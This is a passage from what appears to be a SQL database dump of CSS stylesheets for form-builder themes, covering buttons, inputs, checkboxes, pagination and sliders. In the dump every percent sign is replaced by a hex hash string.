line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #5C00DA;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #3D0886;\r\n}.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #5C00DA;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png)  top left #3D0886;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #E3E2E4;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #5C00DA;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 600;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 4px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"] {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 4px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/02/03/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 11px;\r\n	height: 10px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 1px;\r\n	left: 1px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #DCDADB;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #D1CDCE;\r\n}\r\n.page_active {\r\n	color: #FFF;\r\n	cursor: pointer;\r\n	background-color: #5C00DA;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #5C00DA ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #5C00DA 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5C00DB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #6600F0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7917FF 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5C00DA ), color-stop(49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5C00DB ), color-stop(84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #6600F0 ), color-stop(99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7917FF )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #5C00DA 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5C00DB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #6600F0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7917FF 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #5C00DA 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5C00DB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #6600F0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7917FF 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #5C00DA 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5C00DB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #6600F0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7917FF 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* IE10+ */\r\n	background: linear-gradient(to right, #5C00DA 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #5C00DB 49{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #6600F0 84{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #7917FF 99{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #D9D7D8;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #fff;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(8,'Theme 02 transparent (aquamarine button)','.radio-div input[type=\"radio\"],\r\n.checkbox-div input[type=\"checkbox\"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #EAF9F3;\r\nborder: 1px solid #4D4A58;\r\nmargin-bottom: 10px;\r\ncolor: #4D4A58;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/02/bg.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #CEECE2 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-slider {\r\n	background: #fff !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 4px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 29px;\r\n	background: url([SITE_ROOT]/images/02/01.png) 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/02/02/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 33px;\r\n	background: url([SITE_ROOT]/images/02/next.png) top right #94FFD5;\r\n	padding: 0px 30px 0 15px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/next.png) top right  #E4F3E2;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #4D4A3C;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left #94FFD5;\r\n	padding: 0px 15px 0 30px;\r\n	vertical-align: middle;\r\n	font-weight: 600;\r\n	font-size: 16px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/02/previous.png) top left  #E4F3E2;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/02/bg.png) #94FFD5;\r\n	cursor: pointer;\r\n	font-size: 16px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #4D4A3C;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 600;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 1px solid #CFCFCF;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/02/bg.png) #CFAB1A;\r\n	text-align: left;\r\n	padding: 10px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: center;\r\nfont-size: 18px;\r\nfont-family: Segoe UI;\r\ncolor: #292929;\r\nfont-weight: 